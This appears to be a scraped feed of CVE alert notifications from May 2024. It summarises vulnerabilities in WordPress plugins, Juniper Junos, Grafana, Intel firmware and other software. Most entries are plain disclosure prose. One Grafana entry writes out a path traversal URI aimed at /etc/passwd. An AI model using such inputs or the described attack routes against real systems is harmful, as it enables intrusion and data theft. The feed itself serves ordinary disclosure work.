🚨 CVE-2024-32700Unrestricted Upload of File with Dangerous Type vulnerability in Kognetiks Kognetiks Chatbot for WordPress.This issue affects Kognetiks Chatbot for WordPress: from n/a through 2.0.0.🎖@cveNotify |
|
| 2024-05-17 09:37:42 |
🚨 CVE-2024-32676Improper Restriction of Excessive Authentication Attempts vulnerability in LoginPress LoginPress Pro allows Removing Important Client Functionality.This issue affects LoginPress Pro: from n/a before 3.0.0.🎖@cveNotify |
|
| 2024-05-17 08:37:24 |
🚨 CVE-2024-35110A reflected XSS vulnerability has been found in YzmCMS 7.1. The vulnerability exists in yzmphp/core/class/application.class.php: when logged-in users access a malicious link, their cookies can be captured by an attacker.🎖@cveNotify |
|
| 2024-05-17 07:37:45 |
🚨 CVE-2023-32110Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in artbees JupiterX allows PHP Local File Inclusion.This issue affects JupiterX: from n/a through 3.0.0.🎖@cveNotify |
|
| 2024-05-17 07:37:44 |
🚨 CVE-2023-26526Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Nota-Info Bookly allows Path Traversal, Manipulating Web Input to File System Calls.This issue affects Bookly: from n/a through 21.7.1.🎖@cveNotify |
|
| 2024-05-17 07:37:43 |
🚨 CVE-2023-26009Improper Privilege Management vulnerability in favethemes Houzez Login Register allows Privilege Escalation.This issue affects Houzez Login Register: from n/a through 2.6.3.🎖@cveNotify |
|
| 2024-05-17 07:37:42 |
🚨 CVE-2023-25701Improper Privilege Management vulnerability in WhatArmy WatchTowerHQ allows Privilege Escalation.This issue affects WatchTowerHQ: from n/a through 3.6.16.🎖@cveNotify |
|
| 2024-05-17 07:37:39 |
🚨 CVE-2023-25444Unrestricted Upload of File with Dangerous Type vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin allows Using Malicious Files.This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.7.7.🎖@cveNotify |
|
| 2024-05-17 07:37:38 |
🚨 CVE-2023-24379Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Web-Settler Landing Page Builder – Free Landing Page Templates allows Path Traversal.This issue affects Landing Page Builder – Free Landing Page Templates: from n/a through 3.1.9.9.🎖@cveNotify |
|
| 2024-05-17 07:37:37 |
🚨 CVE-2023-23988Missing Authorization vulnerability in Joseph C Dolson My Tickets.This issue affects My Tickets: from n/a through 1.9.11.🎖@cveNotify |
|
| 2024-05-17 07:37:33 |
🚨 CVE-2023-23888Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Rank Math Rank Math SEO allows Path Traversal.This issue affects Rank Math SEO: from n/a through 1.0.107.2.🎖@cveNotify |
|
| 2024-05-17 07:37:32 |
🚨 CVE-2023-23645Improper Control of Generation of Code ('Code Injection') vulnerability in MainWP MainWP Code Snippets Extension allows Code Injection.This issue affects MainWP Code Snippets Extension: from n/a through 4.0.2.🎖@cveNotify |
|
| 2024-05-17 07:37:31 |
🚨 CVE-2022-45374Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in YARPP allows PHP Local File Inclusion.This issue affects YARPP: from n/a through 5.30.4.🎖@cveNotify |
|
| 2024-05-17 07:37:27 |
🚨 CVE-2022-45070Missing Authorization vulnerability in FmeAddons Conditional Checkout Fields for WooCommerce.This issue affects Conditional Checkout Fields for WooCommerce: from n/a through 1.2.3.🎖@cveNotify |
|
| 2024-05-17 07:37:26 |
🚨 CVE-2023-33327Improper Privilege Management vulnerability in Teplitsa of social technologies Leyka allows Privilege Escalation.This issue affects Leyka: from n/a through 3.30.2.🎖@cveNotify |
|
| 2024-05-17 07:37:25 |
🚨 CVE-2022-40218Missing Authorization vulnerability in ThemeHunk Advance WordPress Search Plugin.This issue affects Advance WordPress Search Plugin: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-05-17 06:37:31 |
🚨 CVE-2024-3231The Popup4Phone WordPress plugin through 1.3.2 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.🎖@cveNotify |
|
| 2024-05-17 06:37:30 |
🚨 CVE-2024-34752Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in PluginOps Landing Page Builder allows Reflected XSS.This issue affects Landing Page Builder: from n/a through 1.5.1.8.🎖@cveNotify |
|
| 2024-05-17 06:37:26 |
🚨 CVE-2024-34567Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in GhozyLab, Inc. Popup Builder allows Stored XSS.This issue affects Popup Builder: from n/a through 1.1.29.🎖@cveNotify |
|
| 2024-05-17 06:37:25 |
🚨 CVE-2024-2744The NextGEN Gallery WordPress plugin before 3.59.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-05-17 06:37:24 |
🚨 CVE-2024-2697The socialdriver-framework WordPress plugin before 2024.0.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2024-05-17 03:37:27 |
🚨 CVE-2024-3551The Penci Soledad Data Migrator plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.0 via the 'data' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. This is limited to just PHP files.🎖@cveNotify |
|
| 2024-05-17 03:08:02 |
🚨 CVE-2024-2063A vulnerability, which was classified as problematic, was found in SourceCodester Petrol Pump Management Software 1.0. Affected is an unknown function of the file /admin/app/profile_crud.php. The manipulation of the argument username leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255378 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-17 03:07:55 |
🚨 CVE-2024-2061A vulnerability classified as critical was found in SourceCodester Petrol Pump Management Software 1.0. This vulnerability affects unknown code of the file /admin/edit_supplier.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255376.🎖@cveNotify |
|
| 2024-05-17 03:07:54 |
🚨 CVE-2024-2057A vulnerability was found in LangChain langchain_community 0.0.26. It has been classified as critical. Affected is the function load_local in the library libs/community/langchain_community/retrievers/tfidf.py of the component TFIDFRetriever. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.0.27 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-255372.🎖@cveNotify |
|
| 2024-05-17 03:07:50 |
🚨 CVE-2024-2022A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/list_ipAddressPolicy.php. The manipulation of the argument GroupId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255301 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-17 03:07:49 |
🚨 CVE-2024-2009A vulnerability was found in Nway Pro 9. It has been rated as problematic. Affected by this issue is the function ajax_login_submit_form of the file login\index.php of the component Argument Handler. The manipulation of the argument rsargs[] leads to information exposure through error message. The attack may be launched remotely. VDB-255266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-17 03:07:48 |
🚨 CVE-2024-27905** UNSUPPORTED WHEN ASSIGNED ** Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Aurora.An endpoint exposing internals to unauthenticated users can be used as a "padding oracle" allowing an anonymous attacker to construct a valid authentication cookie. Potentially this could be combined with vulnerabilities in other components to achieve remote code execution.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-05-17 02:37:57 |
🚨 CVE-2022-32276Grafana 8.4.3 allows unauthenticated access via (for example) a /dashboard/snapshot/*?orgId=0 URI. NOTE: the vendor considers this a UI bug, not a vulnerability🎖@cveNotify |
|
| 2024-05-17 02:37:56 |
🚨 CVE-2022-32275Grafana 8.4.3 allows reading files via (for example) a /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd URI. NOTE: the vendor's position is that there is no vulnerability; this request yields a benign error page, not /etc/passwd content🎖@cveNotify |
|
| 2024-05-17 02:37:55 |
🚨 CVE-2022-29778D-Link DIR-890L 1.20b01 allows attackers to execute arbitrary code due to the hardcoded option Wake-On-Lan for the parameter 'descriptor' at SetVirtualServerSettings.php🎖@cveNotify |
|
| 2024-05-17 02:37:51 |
🚨 CVE-2022-31622MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_compress.cc, when an error occurs (pthread_create returns a nonzero value) while executing the method create_worker_threads, the held lock is not released correctly, which allows local users to trigger a denial of service due to the deadlock. Note: The vendor argues this is just an improper locking bug and not a vulnerability with adverse effects.🎖@cveNotify |
|
| 2024-05-17 02:37:50 |
🚨 CVE-2022-29379Nginx NJS v0.7.3 was discovered to contain a stack overflow in the function njs_default_module_loader at /src/njs/src/njs_module.c. NOTE: multiple third parties dispute this report, e.g., the behavior is only found in unreleased development code that was not part of the 0.7.2, 0.7.3, or 0.7.4 release🎖@cveNotify |
|
| 2024-05-17 01:37:33 |
🚨 CVE-2016-10031WampServer 3.0.6 installs two services called 'wampapache' and 'wampmysqld' with weak file permissions, running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. To properly exploit this vulnerability, the local attacker must insert an executable file called mysqld.exe or httpd.exe and replace the original files. The next time the service starts, the malicious file will get executed as SYSTEM. NOTE: the vendor disputes the relevance of this report, taking the position that a configuration in which "'someone' (an attacker) is able to replace files on a PC" is not "the fault of WampServer.🎖@cveNotify |
|
| 2024-05-17 01:37:26 |
🚨 CVE-2016-6531Open Dental 16.1 and earlier has a hardcoded MySQL root password, which allows remote attackers to obtain administrative access by leveraging access to intranet TCP port 3306. NOTE: the vendor disputes this issue, stating that the "vulnerability note ... is factually false ... there is indeed a default blank password, but it can be changed ... We recommend that users change it, each customer receives direction.🎖@cveNotify |
|
| 2024-05-17 01:37:25 |
🚨 CVE-2016-2427The AES-GCM specification in RFC 5084, as used in Android 5.x and 6.x, recommends 12 octets for the aes-ICVlen parameter field, which might make it easier for attackers to defeat a cryptographic protection mechanism and discover an authentication key via a crafted application, aka internal bug 26234568. NOTE: The vendor disputes the existence of this potential issue in Android, stating "This CVE was raised in error: it referred to the authentication tag size in GCM, whose default according to ASN.1 encoding (12 bytes) can lead to vulnerabilities. After careful consideration, it was decided that the insecure default value of 12 bytes was a default only for the encoding and not default anywhere else in Android, and hence no vulnerability existed.🎖@cveNotify |
|
| 2024-05-17 01:07:33 |
🚨 CVE-2008-1964Stack-based buffer overflow in the demux_nsf_send_headers function in src/demuxers/demux_nsf.c in xine-lib allows remote attackers to have an unknown impact via a long copyright field in an NSF header in an NES Sound file, a different issue than CVE-2008-1878. NOTE: a third party claims that the copyright field always has a safe length🎖@cveNotify |
|
| 2024-05-17 01:07:26 |
🚨 CVE-2008-1467CenterIM 4.22.3 and earlier allows user-assisted remote attackers to execute arbitrary commands via shell metacharacters in a URI, related to "received URLs in the message window." NOTE: this issue has been disputed due to the user-assisted nature, since the URL must be selected and launched by the victim🎖@cveNotify |
|
| 2024-05-17 01:07:25 |
🚨 CVE-2008-0820Cross-site scripting (XSS) vulnerability in index.php in Etomite 0.6.1.4 Final allows remote attackers to inject arbitrary web script or HTML via $_SERVER['PHP_INFO']. NOTE: the vendor disputes this issue in a followup, stating that the affected variable is $_SERVER['PHP_SELF'], and "This is not an Etomite specific exploit and I would like the report rescinded.🎖@cveNotify |
|
| 2024-05-17 00:38:03 |
🚨 CVE-2004-0091NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in register.php for unknown versions of vBulletin allows remote attackers to inject arbitrary HTML or web script via the reg_site (or possibly regsite) parameter. NOTE: the vendor has disputed this issue, saying "There is no hidden field called 'reg_site', nor any $reg_site variable anywhere in the vBulletin 2 or vBulletin 3 source code or templates, nor has it ever existed. We can only assume that this vulnerability was found in a site running code modified from that supplied by Jelsoft.🎖@cveNotify |
|
| 2024-05-17 00:37:56 |
🚨 CVE-2003-0249PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report.🎖@cveNotify |
|
| 2024-05-17 00:37:55 |
🚨 CVE-2002-1776NOTE: this issue has been disputed by the vendor. Symantec Norton AntiVirus 2002 allows remote attackers to bypass virus protection via a Word Macro virus with a .nch or .dbx extension, which is automatically recognized and executed as a Microsoft Office document. NOTE: the vendor has disputed this issue, acknowledging that the initial scan is bypassed, but the Office plug-in would detect the virus before it is executed🎖@cveNotify |
|
| 2024-05-17 00:37:50 |
🚨 CVE-2002-1774NOTE: this issue has been disputed by the vendor. Symantec Norton AntiVirus 2002 allows remote attackers to send viruses that bypass the e-mail scanning via a NULL character in the MIME header before the virus. NOTE: the vendor has disputed this issue, acknowledging that the initial scan is bypassed, but the AutoProtect feature would detect the virus before it is executed🎖@cveNotify |
|
| 2024-05-17 00:37:49 |
🚨 CVE-2001-1517RunAs (runas.exe) in Windows 2000 stores cleartext authentication information in memory, which could allow attackers to obtain usernames and passwords by executing a process that is allocated the same memory page after termination of a RunAs command. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it, and the original researcher did not respond to requests for additional information🎖@cveNotify |
|
| 2024-05-16 23:37:29 |
🚨 CVE-2024-30060Azure Monitor Agent Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-16 23:37:26 |
🚨 CVE-2024-3154A flaw was found in cri-o, where an arbitrary systemd property can be injected via a Pod annotation. Any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.🎖@cveNotify |
|
| 2024-05-16 23:37:25 |
🚨 CVE-2024-28835A flaw has been discovered in GnuTLS where an application crash can be induced when attempting to verify a specially crafted .pem bundle using the "certtool --verify-chain" command.🎖@cveNotify |
|
| 2024-05-16 23:37:24 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-05-16 21:37:36 |
🚨 CVE-2021-33162Improper access control in some Intel(R) Ethernet Adapters and Intel(R) Ethernet Controller I225 Manageability firmware may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-05-16 21:37:35 |
🚨 CVE-2021-33161Improper input validation in some Intel(R) Ethernet Adapters and Intel(R) Ethernet Controller I225 Manageability firmware may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-05-16 21:37:32 |
🚨 CVE-2021-33158Improper neutralization in some Intel(R) Ethernet Adapters and Intel(R) Ethernet Controller I225 Manageability firmware may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-05-16 21:37:31 |
🚨 CVE-2021-33146Improper input validation in some Intel(R) Ethernet Adapters and Intel(R) Ethernet Controller I225 Manageability firmware may allow an unauthenticated user to potentially enable information disclosure via network access.🎖@cveNotify |
|
| 2024-05-16 21:37:30 |
🚨 CVE-2021-33142Improper input validation in some Intel(R) Ethernet Adapters and Intel(R) Ethernet Controller I225 Manageability firmware may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2024-05-16 21:37:26 |
🚨 CVE-2023-29165Unquoted search path or element in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-05-16 21:37:25 |
🚨 CVE-2023-25952Out-of-bounds write in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2024-05-16 21:37:24 |
🚨 CVE-2022-42879NULL pointer dereference in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2024-05-16 21:07:25 |
🚨 CVE-2024-4073A vulnerability was found in Kashipara Online Furniture Shopping Ecommerce Website 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file prodList.php. The manipulation of the argument prodType leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261799.🎖@cveNotify |
|
| 2024-05-16 21:07:24 |
🚨 CVE-2023-6837Multiple WSO2 products have been identified as vulnerable to perform user impersonatoin using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the "Prompt for username, password and consent" option. * A service provider that uses the above IDP for federated authentication and has the "Assert identity using mapped local subject identifier" flag enabled.Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP.When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation.🎖@cveNotify |
|
| 2024-05-16 20:37:36 |
🚨 CVE-2024-30051Windows DWM Core Library Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-16 20:37:35 |
🚨 CVE-2024-35204Veritas System Recovery before 23.2_Hotfix has incorrect permissions for the Veritas System Recovery folder, and thus low-privileged users can conduct attacks.🎖@cveNotify |
|
| 2024-05-16 20:37:31 |
🚨 CVE-2024-30395An Improper Validation of Specified Type of Input vulnerability in Routing Protocol Daemon (RPD) of Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause Denial of Service (DoS).If a BGP update is received over an established BGP session which contains a tunnel encapsulation attribute with a specifically malformed TLV, rpd will crash and restart.This issue affects:Junos OS: * all versions before 21.2R3-S7, * from 21.3 before 21.3R3-S5, * from 21.4 before 21.4R3-S5, * from 22.1 before 22.1R3-S5, * from 22.2 before 22.2R3-S3, * from 22.3 before 22.3R3-S2, * from 22.4 before 22.4R3, * from 23.2 before 23.2R1-S2, 23.2R2.Junos OS Evolved: * all versions before 21.2R3-S7-EVO, * from 21.3-EVO before 21.3R3-S5-EVO, * from 21.4-EVO before 21.4R3-S5-EVO, * from 22.2-EVO before 22.2R3-S3-EVO, * from 22.3-EVO before 22.3R3-S2-EVO, * from 22.4-EVO before 22.4R3-EVO, * from 23.2-EVO before 23.2R1-S2-EVO, 23.2R2-EVO.This is a related but separate issue than the one described in JSA75739🎖@cveNotify |
|
| 2024-05-16 20:37:30 |
🚨 CVE-2024-21610An Improper Handling of Exceptional Conditions vulnerability in the Class of Service daemon (cosd) of Juniper Networks Junos OS on MX Series allows an authenticated, network-based attacker with low privileges to cause a limited Denial of Service (DoS).In a scaled subscriber scenario when specific low privileged commands, received over NETCONF, SSH or telnet, are handled by cosd on behalf of mgd, the respective child management daemon (mgd) processes will get stuck. In case of (Netconf over) SSH this leads to stuck SSH sessions, so that when the connection-limit for SSH is reached new sessions can't be established anymore. A similar behavior will be seen for telnet etc.Stuck mgd processes can be monitored by executing the following command: user@host> show system processes extensive | match mgd | match sbwaitThis issue affects Juniper Networks Junos OS on MX Series:All versions earlier than 20.4R3-S9;21.2 versions earlier than 21.2R3-S7;21.3 versions earlier than 21.3R3-S5;21.4 versions earlier than 21.4R3-S5;22.1 versions earlier than 22.1R3-S4;22.2 versions earlier than 22.2R3-S3;22.3 versions earlier than 22.3R3-S2;22.4 versions earlier than 22.4R3;23.2 versions earlier than 23.2R1-S2, 23.2R2.🎖@cveNotify |
|
| 2024-05-16 20:37:26 |
🚨 CVE-2024-21605An Exposure of Resource to Wrong Sphere vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on SRX 300 Series allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS).Specific valid link-local traffic is not blocked on ports in STP blocked state but is instead sent to the control plane of the device. This leads to excessive resource consumption and in turn severe impact on all control and management protocols of the device.This issue affects Juniper Networks Junos OS: * 21.2 version 21.2R3-S3 and later versions earlier than 21.2R3-S6; * 22.1 version 22.1R3 and later versions earlier than 22.1R3-S4; * 22.2 version 22.2R2and later versions earlier than 22.2R3-S2; * 22.3 version 22.3R2 and later versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2.This issue does not affect Juniper Networks Junos OS 21.4R1 and later versions of 21.4.🎖@cveNotify |
|
| 2024-05-16 20:37:25 |
🚨 CVE-2024-21593An Improper Check or Handling of Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS).If an attacker sends a specific MPLS packet, which upon processing, causes an internal loop, that leads to a PFE crash and restart. Continued receipt of these packets leads to a sustained Denial of Service (DoS) condition. Circuit cross-connect (CCC) needs to be configured on the device for it to be affected by this issue.This issue only affects MX Series with MPC10, MPC11, LC9600, and MX304.This issue affects:Juniper Networks Junos OS21.4 versions from 21.4R3 earlier than 21.4R3-S5;22.2 versions from 22.2R2 earlier than 22.2R3-S2;22.3 versions from 22.3R1 earlier than 22.3R2-S2;22.3 versions from 22.3R3 earlier than 22.3R3-S122.4 versions from 22.4R1 earlier than 22.4R2-S2, 22.4R3;23.2 versions earlier than 23.2R1-S1, 23.2R2.🎖@cveNotify |
|
| 2024-05-16 20:37:24 |
🚨 CVE-2024-21590An Improper Input Validation vulnerability in Juniper Tunnel Driver (jtd) and ICMP module of Juniper Networks Junos OS Evolved allows an unauthenticated attacker within the MPLS administrative domain to send specifically crafted packets to the Routing Engine (RE) to cause a Denial of Service (DoS). When specifically crafted transit MPLS IPv4 packets are received by the Packet Forwarding Engine (PFE), these packets are internally forwarded to the RE. Continued receipt of these packets may create a sustained Denial of Service (DoS) condition.This issue affects Juniper Networks Junos OS: * All versions before 21.2R3-S8-EVO; * from 21.4-EVO before 21.4R3-S6-EVO; * from 22.2-EVO before 22.2R3-S4-EVO; * from 22.3-EVO before 22.3R3-S3-EVO; * from 22.4-EVO before 22.4R3-EVO; * from 23.2-EVO before 23.2R2-EVO. * from 23.4-EVO before 23.4R1-S1-EVO.🎖@cveNotify |
|
| 2024-05-16 20:07:24 |
🚨 CVE-2023-51384In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.🎖@cveNotify |
|
| 2024-05-16 19:37:25 |
🚨 CVE-2024-31226Sunshine is a self-hosted game stream host for Moonlight. Users who ran Sunshine versions 0.17.0 through 0.22.2 as a service on Windows may be impacted when terminating the service if an attacked placed a file named `C:\Program.exe`, `C:\Program.bat`, or `C:\Program.cmd` on the user's computer. This attack vector isn't exploitable unless the user has manually loosened ACLs on the system drive. If the user's system locale is not English, then the name of the executable will likely vary. Version 0.23.0 contains a patch for the issue. Some workarounds are available. One may identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate. Alternatively, ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory `C:`. Require that all executables be placed in write-protected directories.🎖@cveNotify |
|
| 2024-05-16 19:37:24 |
🚨 CVE-2024-5023Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Netflix ConsoleMe allows Command Injection.This issue affects ConsoleMe: before 1.4.0.🎖@cveNotify |
|
| 2024-05-16 18:37:32 |
🚨 CVE-2024-5023Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Netflix ConsoleMe allows Command Injection.This issue affects ConsoleMe: before 1.4.0.🎖@cveNotify |
|
| 2024-05-16 18:37:31 |
🚨 CVE-2024-1417Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in WatchGuard AuthPoint Password Manager on MacOS allows an a adversary with local access to execute code under the context of the AuthPoint Password Manager application.This issue affects AuthPoint Password Manager for MacOS versions before 1.0.6.🎖@cveNotify |
|
| 2024-05-16 18:37:30 |
🚨 CVE-2023-47717IBM Security Guardium 12.0 could allow a privileged user to perform unauthorized actions that could lead to a denial of service. IBM X-Force ID: 271690.🎖@cveNotify |
|
| 2024-05-16 18:37:26 |
🚨 CVE-2024-30378A Use After Free vulnerability in command processing of Juniper Networks Junos OS on MX Series allows a local, authenticated attacker to cause the broadband edge service manager daemon (bbe-smgd) to crash upon execution of specific CLI commands, creating a Denial of Service (DoS) condition. The process crashes and restarts automatically.When specific CLI commands are executed, the bbe-smgd daemon attempts to write into an area of memory (mgd socket) that was already closed, causing the process to crash. This process manages and controls the configuration of broadband subscriber sessions and services. While the process is unavailable, additional subscribers will not be able to connect to the device, causing a temporary Denial of Service condition.This issue only occurs if Graceful Routing Engine Switchover (GRES) and Subscriber Management are enabled.This issue affects Junos OS: * All versions before 20.4R3-S5, * from 21.1 before 21.1R3-S4, * from 21.2 before 21.2R3-S3, * from 21.3 before 21.3R3-S5, * from 21.4 before 21.4R3-S5, * from 22.1 before 22.1R3, * from 22.2 before 22.2R3, * from 22.3 before 22.3R2;🎖@cveNotify |
|
| 2024-05-16 18:37:25 |
🚨 CVE-2024-30382An Improper Handling of Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based, unauthenticated attacker to send a specific routing update, causing an rpd core due to memory corruption, leading to a Denial of Service (DoS).This issue can only be triggered when the system is configured for CoS-based forwarding (CBF) with a policy map containing a cos-next-hop-map action (see below).This issue affects:Junos OS: * all versions before 20.4R3-S10, * from 21.2 before 21.2R3-S8, * from 21.3 before 21.3R3, * from 21.4 before 21.4R3, * from 22.1 before 22.1R2;Junos OS Evolved: * all versions before 21.2R3-S8-EVO, * from 21.3 before 21.3R3-EVO, * from 21.4 before 21.4R3-EVO, * from 22.1 before 22.1R2-EVO.🎖@cveNotify |
|
| 2024-05-16 18:37:24 |
🚨 CVE-2024-30381An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Juniper Networks Paragon Active Assurance Control Center allows a network-adjacent attacker with root access to a Test Agent Appliance the ability to access sensitive information about downstream devices.The "netrounds-probe-login" daemon (also called probe_serviced) exposes functions where the Test Agent (TA) Appliance pushes interface state/config, unregister itself, etc. The remote service accidentally exposes an internal database object that can be used for direct database access on the Paragon Active Assurance Control Center.This issue affects Paragon Active Assurance: 4.1.0, 4.2.0.🎖@cveNotify |
|
| 2024-05-16 18:07:24 |
🚨 CVE-2024-30040Windows MSHTML Platform Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-05-16 17:37:30 |
🚨 CVE-2024-27260IBM AIX could 7.2, 7.3, VIOS 3.1, and VIOS 4.1 allow a non-privileged local user to exploit a vulnerability in the invscout command to execute arbitrary commands. IBM X-Force ID: 283985.🎖@cveNotify |
|
| 2024-05-16 17:37:26 |
🚨 CVE-2024-30378A Use After Free vulnerability in command processing of Juniper Networks Junos OS on MX Series allows a local, authenticated attacker to cause the broadband edge service manager daemon (bbe-smgd) to crash upon execution of specific CLI commands, creating a Denial of Service (DoS) condition. The process crashes and restarts automatically.When specific CLI commands are executed, the bbe-smgd daemon attempts to write into an area of memory (mgd socket) that was already closed, causing the process to crash. This process manages and controls the configuration of broadband subscriber sessions and services. While the process is unavailable, additional subscribers will not be able to connect to the device, causing a temporary Denial of Service condition.This issue only occurs if Graceful Routing Engine Switchover (GRES) and Subscriber Management are enabled.This issue affects Junos OS: * All versions before 20.4R3-S5, * from 21.1 before 21.1R3-S4, * from 21.2 before 21.2R3-S3, * from 21.3 before 21.3R3-S5, * from 21.4 before 21.4R3-S5, * from 22.1 before 22.1R3, * from 22.2 before 22.2R3, * from 22.3 before 22.3R2;🎖@cveNotify |
|
| 2024-05-16 17:37:25 |
🚨 CVE-2024-30382An Improper Handling of Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based, unauthenticated attacker to send a specific routing update, causing an rpd core due to memory corruption, leading to a Denial of Service (DoS).This issue can only be triggered when the system is configured for CoS-based forwarding (CBF) with a policy map containing a cos-next-hop-map action (see below).This issue affects:Junos OS: * all versions before 20.4R3-S10, * from 21.2 before 21.2R3-S8, * from 21.3 before 21.3R3, * from 21.4 before 21.4R3, * from 22.1 before 22.1R2;Junos OS Evolved: * all versions before 21.2R3-S8-EVO, * from 21.3 before 21.3R3-EVO, * from 21.4 before 21.4R3-EVO, * from 22.1 before 22.1R2-EVO.🎖@cveNotify |
|
| 2024-05-16 17:37:24 |
🚨 CVE-2024-30381An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Juniper Networks Paragon Active Assurance Control Center allows a network-adjacent attacker with root access to a Test Agent Appliance the ability to access sensitive information about downstream devices.The "netrounds-probe-login" daemon (also called probe_serviced) exposes functions where the Test Agent (TA) Appliance pushes interface state/config, unregister itself, etc. The remote service accidentally exposes an internal database object that can be used for direct database access on the Paragon Active Assurance Control Center.This issue affects Paragon Active Assurance: 4.1.0, 4.2.0.🎖@cveNotify |
|
| 2024-05-16 16:37:31 |
